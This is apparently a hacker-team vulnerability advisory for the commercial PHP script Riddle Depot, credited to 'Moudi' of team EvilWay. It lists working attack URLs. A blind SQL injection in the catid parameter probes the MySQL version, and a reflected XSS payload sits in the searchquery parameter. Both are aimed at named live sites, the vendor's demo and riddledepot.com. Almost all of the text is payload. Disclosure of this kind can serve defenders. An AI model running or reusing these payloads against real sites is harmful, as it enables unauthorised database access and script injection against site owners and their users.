==========
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==========
        [»] Riddle Depot Multiple Remote Vulnerabilities
==========

	[»] Script:             [ Riddle Depot ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.phpscriptsnow.com/product_info.php?cPath=21&products_id=41  ]
	[&#187;] Founder:            [ Moudi <m0udi@9.cn> ]
        [&#187;] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [&#187;] Team:               [ EvilWay ]
        [&#187;] Dork:               [ OFF ]
        [&#187;] Price:              [ $24.99 ]
        [&#187;] Site :              [ https://security-shell.ws/forum.php ]

##############

===[ Exploit + LIVE : BLIND SQL vulnerability ]===

[&#187;] http://www.site.com/patch/list.php?pagenum=0&catid=[BLIND]

[&#187;] http://www.phpscriptsnow.com/demo/riddles/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=5 TRUE
    http://www.phpscriptsnow.com/demo/riddles/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=4 FALSE
    SO MYSQL: V5
    http://riddledepot.com/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=5 TRUE
    http://riddledepot.com/list.php?pagenum=0&catid=4+AND%20SUBSTRING(@@version,1,1)=4 FALSE
    SO MYSQL: V5

===[ Exploit XSS + LIVE : vulnerability ]===

[&#187;] http://www.site.com/patch/results.php?searchquery=[XSS]

[&#187;] http://www.phpscriptsnow.com/demo/riddles/results.php?searchquery=1<script>alert(308297104532)</script>&search=Search
[&#187;] http://riddledepot.com/results.php?searchquery=1<script>alert(308297104532)</script>&search=Search


Author: Moudi
##############